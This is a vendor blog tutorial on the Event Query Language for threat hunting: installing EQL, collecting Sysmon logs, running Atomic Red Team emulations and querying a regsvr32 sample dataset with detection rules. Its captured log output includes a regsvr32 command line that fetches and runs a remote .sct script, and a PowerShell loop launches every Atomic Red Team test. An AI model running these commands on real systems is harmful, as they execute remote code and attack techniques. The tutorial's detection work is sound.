Getting started with EQL
Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog content to elastic.co. See Elastic Security to learn more about our integrated security solutions.
If you missed our introductory post about the Event Query Language (EQL) or our recent announcements about the public release of EQL, then we're sorry we missed you, but have no fear, this is your getting started guide with EQL.
Event Query Language Refresher
As a quick recap, EQL is a language to express relationships between events and additionally has the power to normalize your data regardless of data source and not constrained by platform. EQL is already integrated into the Endgame platform to bolster our behavior-based detections, but now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology. Whether you want to simply search with EQL, perform basic hunting via basic data stacking and filtering, or express complex behaviors as part of hypothesis-based hunting, EQL’s flexibility as a language can help improve your team’s effectiveness in many different ways.
We also built a library of analytics written in EQL, aimed to provide a new way for the infosec community to detail detections of attacker techniques. The EQL Analytics Library comes with a set of behavior based detections mapped to MITRE ATT&CK™, and can convert between various data formats. Please feel free to contribute analytics or contact us so we can help provide the blue perspective to the various red emulations out there.
Install EQL
First things first, let's install EQL. For full details, visit the EQL documentation.
The EQL module currently supports Python 2.7 and 3.5 - 3.7. Assuming a supported Python version is installed, install EQL directly from PyPi with the command:
$ pip install eql
If Python is configured and already in the PATH, then eql will be readily available, and can be checked by running the command:
$ eql --version eql 0.6.0
Source code for EQL can be found here.
Getting Data
We know you are excited to execute an EQL query, so let's get some data ready for you.
Our initial release required interested users to generate data. Being aware that this might represent a barrier to entry for some, we have provided a static test dataset to use while exploring the tool and syntax, which can be found here. This data was generated by executing subsets of Atomic Red and RTA while simultaneously collecting events using Sysmon. We additionally normalized the data, but that is not required to get you started on EQL. Keep in mind, we know the data is not perfect or complete, and we would gladly welcome a hand.
Sysmon
If you prefer to generate your own data by detonating your own scripts or directly running all tests from Atomic Red Team then follow our Sysmon guide.
Install
Start by downloading Sysmon from SysInternals.
To install Sysmon, from a terminal, simply change to the directory where the unzipped binary is located, then run one of the following commands as an Administrator:
To capture all default event types, with all hashing algorithms, run:
$ Sysmon.exe -i -h * -n -l
To configure Sysmon with a specific XML configuration file, run:
$ Sysmon.exe -i C:\path\to\my\config.xml
Full details of what each flag does can be found on the Microsoft Sysmon page
Getting Sysmon logs with PowerShell
Helpful PowerShell functions for parsing Sysmon events from Windows Event Logs can be found in our utils directory, from within eqllib. The code below is from utils/scrape-events.ps1
Getting logs into JSON format can be done by piping to PowerShell cmdlets within an elevated PowerShell.exe console.
# Import the functions provided within scrape-events Import-Module .\utils\scrape-events.ps1 # Save the most recent 5000 Sysmon logs Get-LatestLogs | Out-File -Encoding ASCII -FilePath my-sysmon-data.json # Save the most recent 1000 Sysmon process creation events Get-LatestProcesses | Out-File -Encoding ASCII -FilePath my-sysmon-data.json
To get all Sysmon logs from Windows Event Logs, run the PowerShell command
Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath my-sysmon-data.json
Atomic Red Team
Bringing Atomic Red Team into the mix, we can collect sysmon data for every atomic test contained within. Atomic Red Team is an aggregation of atomic tests maintained by Red Canary, which replicate adversary behaviors described in MITRE ATT&CK.
Once sysmon is up and running, use the following PowerShell code to execute Atomic Red Team from the Github repository:
[System.Collections.HashTable]$AllAtomicTests = @{} $AtomicFilePath = 'C:\AtomicRedTeam\atomics\' Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object { $currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName) $parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw )) $AllAtomicTests.Add($currentTechnique, $parsedYaml); } $AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value }
Now, as stated above, get all Sysmon logs from Windows Event Logs with the following PowerShell command:
Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath atomic-red-team-data.json
Query like a Boss
Enough is enough, let's write some rules! Please start by familiarizing yourself with EQL grammar and syntax, seen here or even from our initial blog post.
For demo purposes, we will use the dataset titled, normalized-sysmon-T1117-AtomicRed-regsvr32.json, which is an Atomic Red Team test for regsvr32 misuse. We encourage you to try some of these practices on larger datasets, which we have provided.
Let's first get a feel for how many events we have in the data.
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count' {"count": 150, "key": "totals"}
To breakdown even further, we can see how many of each event_type we have
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count event_type' {"count": 1, "key": "network", "percent": 0.006666666666666667} {"count": 4, "key": "process", "percent": 0.02666666666666667} {"count": 56, "key": "registry", "percent": 0.37333333333333335} {"count": 89, "key": "image_load", "percent": 0.5933333333333334}
Great, so we have data, let's try to understand it further. Maybe since we know this is T1117, we want to just look for regsvr32?
$ eql query -f normalized-sysmon-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | count" {"count": 143, "key": "totals"}
Ok, as expected, we have regsvr32, let's examine the command line artifacts and unique those results to see if notice anything.
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | unique command_line" {"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"} {"event_type": "image_load", "image_name": "regsvr32.exe", "image_path": "C:\\Windows\\System32\\regsvr32.exe", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237140000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
As we can see, we have an atomic test loading scrobj.dll. Let’s check out our current analytics in eqllib. First, let’s look at the Suspicious Script Object Execution analytic:
image_load where image_name == "scrobj.dll" and process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")
If we look at our dataset, what do we see?
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "image_load where image_name == 'scrobj.dll' and process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')" {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
Very cool, what about our Atomic Blue analytic within eqllib? We can run our existing analytic to see if it matches. The analytic looks like,
process where subtype.create and process_name == "regsvr32.exe" and wildcard(command_line, "*scrobj*", "*/i:*", "*-i:*", "*.sct*")
Now, let’s switch to eqllib to use the available rules with our survey capability:
$ eqllib survey -f normalized-T1117-AtomicRed-regsvr32.json eqllib/analytics/defense-evasion/T1117-scrobj-load.toml {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
Through EQL, you can also look across different events types. This is important because it can allow us to bolster up commands for tighter detections and reduce the occurence of false positives. Here we check to see if the subsequent image load of the scrobj.dll and network event for downloading the remote sct file or other C2 actions are also occurring, which indicates that the technique progressed and more likely succeeded. We can do all these things with EQL!
sequence by pid [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')] [image_load where image_name == 'scrobj.dll'] [network where true]
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "sequence by pid [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')] [image_load where image_name == 'scrobj.dll'] [network where true]" {"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"} {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"} {"destination_address": "151.101.48.133", "destination_port": "443", "event_type": "network", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "protocol": "tcp", "source_address": "192.168.162.134", "source_port": "50505", "subtype": "outgoing", "timestamp": 131883573238680000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}
We could also take stdout and pipe to powershell or JQ and make pretty tables --the power is yours.
I feel Atomic Blue
If you were the overachiever and detonated all the Atomic Red Team tests, then welcome Atomic Blue (https://eqllib.readthedocs.io/en/latest/atomicblue.html).
In the EQL Analytics Library, the analytics that map to Atomic Red Team are called Atomic Blue Detections. In our earlier blog post, we showed how these are detections that work in tandem with Atomic Red Team, since both are heavily influenced by the the MITRE ATT&CK framework. Checkout our current coverage by surveying the rules against the data you just collected by executing:
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/
This survey script can also provide just counts, if you’re looking for a quick breakdown.
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count
How did we do? Wish we had more rules? Well, we can't spoil all the fun. We will have more analytics posted soon, but of course, please contribute and help out the community! We want this to be a shared effort, with various types of analytics --even beyond ATT&CK.
Analytic Pause
Let's pause for a moment and talk analytics. You may have recognized that the metadata and query that the analytic is comprised of is structured in TOML.
A breakdown of the analytic schema is as follows:
categories: The groups that the analytic belongs in. The detect category indicates that an analytic is potentially useful as an alert. The hunt category indicates that an analytic might catch more generic behavior, or a behavior that has false positives and frequently matches benign activity.
contributors: Put your name or organization here!
confidence: A gut feel about the confidence of the rule--how likely the analytic will match suspicious activity.
created_date: When the rule was originally created.
description: Short description of the analytic. This should describe how it works, what is supposed to be detected, and potential false positives.
name: Title the rule as descriptive, but not overly verbose.
notes: Any disclaimers, caveats or other notes that would be helpful to share to the audience.
os: What operating systems the analytic is written for. We’ve only written analytics for Windows so far, but welcome more!
references: Links to blogs or other sources of information to support the technique or analytic logic.
techniques: A mapping to the relevant ATT&CK techniques, (e.g. T1015).
tactics: A mapping to the relevant ATT&CK tactics. This isn’t necessarily all of the potential tactics on the technique pages for ATT&CK, and often depends on the detection details.
tags: Tags used for grouping the rule. For instance, all Atomic Blue rules are tagged with “atomicblue.”
updated_date: When the rule was last updated.
Data Normalization
You probably noticed the --source parameter when using eqllib,
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count
This is another powerful aspect of EQL. EQL queries are platform agnostic and can run on any data source, as long as we provide a data source schema mapping. For example, a process identifier is denoted by the pid field. If a new data source reports its process identifier with a field such as process_id, we represent this mapping from the process_id -> pid. From there, any usage of pid is immediately compatible.
We can also define more sophisticated mappings. In Sysmon, there is no field to represent the file name for a running process. Our schema calls this process_name, but in Sysmon it’s nested within the Image field. Since mappings can also be defined with functions, we can define a mapping from baseName(Image) to process_name. This mapping works for both normalizing data and actual queries. For instance process_name == "net.exe" will be converted to Image == "*\\net.exe". This is just one way that we achieve compatibility with various data sources with different data model choices.
This is a powerful construct - analytics written once can be run on a wide variety of data sources and platforms. All we need is a mapping when field names are different.
Currently we have Microsoft Sysmon mapped, with more sources to come. But, you don’t have to wait for us. As you can see from the sysmon.toml schema, adding your own data sources is straightforward and it is automatically parsed by eqllib.
Have Fun!
Please follow us @eventquerylang. We will be updating our docs soon with a section on how to contribute, but in the meantime please feel free to submit PRs or post issues. We look forward to sharing more blogs posts in the near future as we write more analytics and share analytic packages specifically designed to help you hunt. Cheers!